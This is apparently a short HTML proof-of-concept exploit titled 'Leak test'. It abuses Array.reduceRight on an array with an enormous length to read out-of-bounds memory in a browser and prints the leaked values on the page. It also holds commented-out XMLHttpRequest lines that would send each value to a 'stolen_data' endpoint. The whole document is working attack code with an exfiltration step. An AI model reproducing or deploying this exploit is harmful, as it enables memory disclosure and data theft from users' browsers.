<html><body><h2>Leak test</h2><script>

xyz = new Array;
xyz.length = 4294967240;

a = function bleh(prev, current, index, array) {
    if(typeof current == "number" || current != "NaN" && current != "undefined")
    {
        //r = new XMLHttpRequest();
        //r.open('GET', 'http://localhost:4567/stolen_data?t=' + typeof current + '&v=' + current, false);
        //r.send(null);
        p = document.createElement("p");
        p.textContent = "[" + typeof current +"] " + current;
        document.body.appendChild(p);
    }
    else {
        p = document.createElement("p");
        p.textContent = "miss";
        document.body.appendChild(p);
    }
}

xyz.reduceRight(a,1,2,3);
</script></body></html>

